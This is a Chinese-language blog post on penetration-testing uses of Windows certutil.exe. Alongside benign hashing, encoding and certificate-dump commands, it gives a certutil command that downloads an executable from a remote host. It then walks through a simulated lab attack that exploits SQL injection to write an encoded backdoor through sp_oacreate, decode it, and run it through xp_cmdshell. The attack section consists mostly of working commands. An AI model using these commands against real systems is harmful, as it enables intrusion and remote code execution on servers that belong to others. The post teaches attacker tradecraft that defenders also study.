<!DOCTYPE html>
<html lang=en>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="技巧 Tricks | certUtil 命令渗透实战利用🌍 0x00 前言certutil.exe 是一个命令行程序，作为证书服务的一部分安装。可以使用 certutil.exe 转储和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原 CA 组件，以及验证证书、密钥对和证书链。 应急响应中经常使用 certutil 命令来计算样本 Hash，渗透测试项目中也可以使用该命令来远程下载或">
<meta property="og:type" content="article">
<meta property="og:title" content="技巧 Tricks | certUtil 命令渗透实战利用">
<meta property="og:url" content="https://naykcin.top/2019/12/01/certutil/index.html">
<meta property="og:site_name" content="Naykcin&#39;s Page">
<meta property="og:description" content="技巧 Tricks | certUtil 命令渗透实战利用🌍 0x00 前言certutil.exe 是一个命令行程序，作为证书服务的一部分安装。可以使用 certutil.exe 转储和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原 CA 组件，以及验证证书、密钥对和证书链。 应急响应中经常使用 certutil 命令来计算样本 Hash，渗透测试项目中也可以使用该命令来远程下载或">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.24.20.png">
<meta property="og:image" content="https://naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.08.36.png">
<meta property="og:image" content="https://naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.37.15.png">
<meta property="og:image" content="https://naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.41.54.png">
<meta property="og:image" content="https://naykcin.top/2019/12/01/certutil/a.png">
<meta property="og:updated_time" content="2020-05-22T17:50:29.508Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="技巧 Tricks | certUtil 命令渗透实战利用">
<meta name="twitter:description" content="技巧 Tricks | certUtil 命令渗透实战利用🌍 0x00 前言certutil.exe 是一个命令行程序，作为证书服务的一部分安装。可以使用 certutil.exe 转储和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原 CA 组件，以及验证证书、密钥对和证书链。 应急响应中经常使用 certutil 命令来计算样本 Hash，渗透测试项目中也可以使用该命令来远程下载或">
<meta name="twitter:image" content="https://naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.24.20.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>技巧 Tricks | certUtil 命令渗透实战利用</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/nickyan7">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/01/02/linux-emergency/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/11/24/jsEncrypter/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://naykcin.top/2019/12/01/certutil/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://naykcin.top/2019/12/01/certutil/&text=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://naykcin.top/2019/12/01/certutil/&is_video=false&description=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=技巧 Tricks | certUtil 命令渗透实战利用&body=Check out this article: https://naykcin.top/2019/12/01/certutil/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://naykcin.top/2019/12/01/certutil/&name=技巧 Tricks | certUtil 命令渗透实战利用&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://naykcin.top/2019/12/01/certutil/&t=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#技巧-Tricks-certUtil-命令渗透实战利用"><span class="toc-number">1.</span> <span class="toc-text">技巧 Tricks | certUtil 命令渗透实战利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#🌍-0x00-前言"><span class="toc-number">1.1.</span> <span class="toc-text">🌍 0x00 前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x01-远程文件下载"><span class="toc-number">1.2.</span> <span class="toc-text">📍 0x01 远程文件下载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x02-计算文件-Hash"><span class="toc-number">1.3.</span> <span class="toc-text">📍 0x02 计算文件 Hash</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-MD4"><span class="toc-number">1.3.1.</span> <span class="toc-text">⚙️ MD4</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-MD5"><span class="toc-number">1.3.2.</span> <span class="toc-text">⚙️ MD5</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-SHA-1"><span class="toc-number">1.3.3.</span> <span class="toc-text">⚙️ SHA-1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-SHA-256"><span class="toc-number">1.3.4.</span> <span class="toc-text">⚙️ SHA-256</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-SHA-512"><span class="toc-number">1.3.5.</span> <span class="toc-text">⚙️ SHA-512</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x03-任意文件编码"><span class="toc-number">1.4.</span> <span class="toc-text">📍 0x03 任意文件编码</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-Base64-Encode"><span class="toc-number">1.4.1.</span> <span class="toc-text">⚙️ Base64 Encode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-Base64-Decode"><span class="toc-number">1.4.2.</span> <span class="toc-text">⚙️ Base64 Decode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-HEX-Encode"><span class="toc-number">1.4.3.</span> <span class="toc-text">⚙️ HEX Encode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-HEX-Decode"><span class="toc-number">1.4.4.</span> <span class="toc-text">⚙️ HEX Decode</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x04-读取证书信息"><span class="toc-number">1.5.</span> <span class="toc-text">📍 0x04 读取证书信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x05-模拟实战利用"><span class="toc-number">1.6.</span> <span class="toc-text">📍 0x05 模拟实战利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-生成后门"><span class="toc-number">1.6.1.</span> <span class="toc-text">⚙️ 生成后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-文件转码"><span class="toc-number">1.6.2.</span> <span class="toc-text">⚙️ 文件转码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-写入后门"><span class="toc-number">1.6.3.</span> <span class="toc-text">⚙️ 写入后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-执行程序"><span class="toc-number">1.6.4.</span> <span class="toc-text">⚙️ 执行程序</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#⚠️-0x06-后记"><span class="toc-number">1.7.</span> <span class="toc-text">⚠️ 0x06 后记</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        技巧 Tricks | certUtil 命令渗透实战利用
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Naykcin's Page</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-12-01T09:41:09.000Z" itemprop="datePublished">2019-12-01</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="技巧-Tricks-certUtil-命令渗透实战利用"><a href="#技巧-Tricks-certUtil-命令渗透实战利用" class="headerlink" title="技巧 Tricks | certUtil 命令渗透实战利用"></a><center>技巧 Tricks | certUtil 命令渗透实战利用</center></h2><h3 id="🌍-0x00-前言"><a href="#🌍-0x00-前言" class="headerlink" title="🌍 0x00 前言"></a>🌍 0x00 前言</h3><p>certutil.exe 是一个命令行程序，作为证书服务的一部分安装。可以使用 certutil.exe 转储和显示证书颁发机构（CA）配置信息，配置证书服务，备份和还原 CA 组件，以及验证证书、密钥对和证书链。</p>
<p>应急响应中经常使用 certutil 命令来计算样本 Hash，渗透测试项目中也可以使用该命令来远程下载或写入文件来进行下一步动作，同时还可以解决换行问题。</p>
<h3 id="📍-0x01-远程文件下载"><a href="#📍-0x01-远程文件下载" class="headerlink" title="📍 0x01 远程文件下载"></a>📍 0x01 远程文件下载</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -urlcache -split -f http://1.1.1.1/a.exe c:\temp\a.exe</span><br></pre></td></tr></table></figure>

<p><img src="//naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.24.20.png" alt="屏幕快照 2020-02-03 下午2.24.20"></p>
<h3 id="📍-0x02-计算文件-Hash"><a href="#📍-0x02-计算文件-Hash" class="headerlink" title="📍 0x02 计算文件 Hash"></a>📍 0x02 计算文件 Hash</h3><h4 id="⚙️-MD4"><a href="#⚙️-MD4" class="headerlink" title="⚙️ MD4"></a>⚙️ MD4</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -hashfile lcx.exe MD4</span><br></pre></td></tr></table></figure>

<h4 id="⚙️-MD5"><a href="#⚙️-MD5" class="headerlink" title="⚙️ MD5"></a>⚙️ MD5</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -hashfile lcx.exe MD5</span><br></pre></td></tr></table></figure>

<h4 id="⚙️-SHA-1"><a href="#⚙️-SHA-1" class="headerlink" title="⚙️ SHA-1"></a>⚙️ SHA-1</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -hashfile lcx.exe SHA1</span><br></pre></td></tr></table></figure>

<h4 id="⚙️-SHA-256"><a href="#⚙️-SHA-256" class="headerlink" title="⚙️ SHA-256"></a>⚙️ SHA-256</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -hashfile lcx.exe SHA256</span><br></pre></td></tr></table></figure>

<h4 id="⚙️-SHA-512"><a href="#⚙️-SHA-512" class="headerlink" title="⚙️ SHA-512"></a>⚙️ SHA-512</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -hashfile lcx.exe SHA512</span><br></pre></td></tr></table></figure>

<p><img src="//naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.08.36.png" alt="屏幕快照 2020-02-03 下午2.08.36"></p>
<h3 id="📍-0x03-任意文件编码"><a href="#📍-0x03-任意文件编码" class="headerlink" title="📍 0x03 任意文件编码"></a>📍 0x03 任意文件编码</h3><h4 id="⚙️-Base64-Encode"><a href="#⚙️-Base64-Encode" class="headerlink" title="⚙️ Base64 Encode"></a>⚙️ Base64 Encode</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -encode lcx.exe c:\temp\out.txt</span><br></pre></td></tr></table></figure>

<h4 id="⚙️-Base64-Decode"><a href="#⚙️-Base64-Decode" class="headerlink" title="⚙️ Base64 Decode"></a>⚙️ Base64 Decode</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -decode c:\temp\out.txt c:\temp\demo.exe</span><br></pre></td></tr></table></figure>

<h4 id="⚙️-HEX-Encode"><a href="#⚙️-HEX-Encode" class="headerlink" title="⚙️ HEX Encode"></a>⚙️ HEX Encode</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -encodehex lcx.exe c:\temp\hex.txt</span><br></pre></td></tr></table></figure>

<h4 id="⚙️-HEX-Decode"><a href="#⚙️-HEX-Decode" class="headerlink" title="⚙️ HEX Decode"></a>⚙️ HEX Decode</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -decodehex c:\temp\hex.txt c:\temp\test.exe</span><br></pre></td></tr></table></figure>

<h3 id="📍-0x04-读取证书信息"><a href="#📍-0x04-读取证书信息" class="headerlink" title="📍 0x04 读取证书信息"></a>📍 0x04 读取证书信息</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -dump ca-burdle.crt</span><br></pre></td></tr></table></figure>

<h3 id="📍-0x05-模拟实战利用"><a href="#📍-0x05-模拟实战利用" class="headerlink" title="📍 0x05 模拟实战利用"></a>📍 0x05 模拟实战利用</h3><p>此次模拟实战的环境为目标系统具有 SQL 注入漏洞，</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">// Target - server 08</span><br><span class="line">172.16.232.140</span><br><span class="line"></span><br><span class="line">// Hacker - win 7</span><br><span class="line">172.16.232.136</span><br></pre></td></tr></table></figure>

<h4 id="⚙️-生成后门"><a href="#⚙️-生成后门" class="headerlink" title="⚙️ 生成后门"></a>⚙️ 生成后门</h4><p><img src="//naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.37.15.png" alt="屏幕快照 2020-02-03 下午2.37.15"></p>
<h4 id="⚙️-文件转码"><a href="#⚙️-文件转码" class="headerlink" title="⚙️ 文件转码"></a>⚙️ 文件转码</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">c:\&gt; certutil -encode fuckthem.exe c:\temp\demo.txt</span><br></pre></td></tr></table></figure>

<p><img src="//naykcin.top/2019/12/01/certutil/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202020-02-03%20%E4%B8%8B%E5%8D%882.41.54.png" alt="屏幕快照 2020-02-03 下午2.41.54"></p>
<h4 id="⚙️-写入后门"><a href="#⚙️-写入后门" class="headerlink" title="⚙️ 写入后门"></a>⚙️ 写入后门</h4><ol>
<li><p>一句话木马上传写入</p>
</li>
<li><p>SQL 注入点写入后门</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">declare @o int, @f int, @t int, @ret int</span><br><span class="line">exec sp_oacreate &apos;scripting.filesystemobject&apos;, @o out</span><br><span class="line">exec sp_oamethod @o, &apos;createtextfile&apos;, @f out, &apos;c:\Windows\temp\readme.txt&apos;, 1</span><br><span class="line">exec @ret = sp_oamethod @f, &apos;writeline&apos;, NULL, &apos;xxxxxxxxx&apos;</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h4 id="⚙️-执行程序"><a href="#⚙️-执行程序" class="headerlink" title="⚙️ 执行程序"></a>⚙️ 执行程序</h4><ol>
<li><p>一句话转码直接执行</p>
</li>
<li><p>SQL 语句执行</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">EXEC master.dbo.xp_cmdshell &apos;certutil -decode c:\windows\Temp\readme.txt c:\windows\Temp\update.exe &amp; c:\windows\Temp\update.exe&apos;</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h3 id="⚠️-0x06-后记"><a href="#⚠️-0x06-后记" class="headerlink" title="⚠️ 0x06 后记"></a>⚠️ 0x06 后记</h3><p>需要注意的几点：</p>
<ol>
<li><p>在 cmd 中一次执行多条命令语句，用 &amp;&amp;</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">// 在运行可执行文件时需要绝对路径</span><br><span class="line">c:\&gt; certutil -decode .\demo.txt .\update.exe &amp;&amp; c:\update.exe</span><br></pre></td></tr></table></figure>
</li>
<li><p>在 powershell 中一次执行多条命令语句，用 ;</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">PS c:\&gt; certutil -decode .\demo.txt .\update.exe; c:\update.exe</span><br></pre></td></tr></table></figure>

</li>
</ol>
<p><img src="//naykcin.top/2019/12/01/certutil/a.png" alt="a"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/nickyan7">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#技巧-Tricks-certUtil-命令渗透实战利用"><span class="toc-number">1.</span> <span class="toc-text">技巧 Tricks | certUtil 命令渗透实战利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#🌍-0x00-前言"><span class="toc-number">1.1.</span> <span class="toc-text">🌍 0x00 前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x01-远程文件下载"><span class="toc-number">1.2.</span> <span class="toc-text">📍 0x01 远程文件下载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x02-计算文件-Hash"><span class="toc-number">1.3.</span> <span class="toc-text">📍 0x02 计算文件 Hash</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-MD4"><span class="toc-number">1.3.1.</span> <span class="toc-text">⚙️ MD4</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-MD5"><span class="toc-number">1.3.2.</span> <span class="toc-text">⚙️ MD5</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-SHA-1"><span class="toc-number">1.3.3.</span> <span class="toc-text">⚙️ SHA-1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-SHA-256"><span class="toc-number">1.3.4.</span> <span class="toc-text">⚙️ SHA-256</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-SHA-512"><span class="toc-number">1.3.5.</span> <span class="toc-text">⚙️ SHA-512</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x03-任意文件编码"><span class="toc-number">1.4.</span> <span class="toc-text">📍 0x03 任意文件编码</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-Base64-Encode"><span class="toc-number">1.4.1.</span> <span class="toc-text">⚙️ Base64 Encode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-Base64-Decode"><span class="toc-number">1.4.2.</span> <span class="toc-text">⚙️ Base64 Decode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-HEX-Encode"><span class="toc-number">1.4.3.</span> <span class="toc-text">⚙️ HEX Encode</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-HEX-Decode"><span class="toc-number">1.4.4.</span> <span class="toc-text">⚙️ HEX Decode</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x04-读取证书信息"><span class="toc-number">1.5.</span> <span class="toc-text">📍 0x04 读取证书信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#📍-0x05-模拟实战利用"><span class="toc-number">1.6.</span> <span class="toc-text">📍 0x05 模拟实战利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-生成后门"><span class="toc-number">1.6.1.</span> <span class="toc-text">⚙️ 生成后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-文件转码"><span class="toc-number">1.6.2.</span> <span class="toc-text">⚙️ 文件转码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-写入后门"><span class="toc-number">1.6.3.</span> <span class="toc-text">⚙️ 写入后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#⚙️-执行程序"><span class="toc-number">1.6.4.</span> <span class="toc-text">⚙️ 执行程序</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#⚠️-0x06-后记"><span class="toc-number">1.7.</span> <span class="toc-text">⚠️ 0x06 后记</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://naykcin.top/2019/12/01/certutil/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://naykcin.top/2019/12/01/certutil/&text=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://naykcin.top/2019/12/01/certutil/&is_video=false&description=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=技巧 Tricks | certUtil 命令渗透实战利用&body=Check out this article: https://naykcin.top/2019/12/01/certutil/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://naykcin.top/2019/12/01/certutil/&title=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://naykcin.top/2019/12/01/certutil/&name=技巧 Tricks | certUtil 命令渗透实战利用&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://naykcin.top/2019/12/01/certutil/&t=技巧 Tricks | certUtil 命令渗透实战利用"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2020
    Naykcin
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="https://github.com/nickyan7">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<!-- clipboard -->

  <script src="/lib/clipboard/clipboard.min.js"></script>
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>

<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
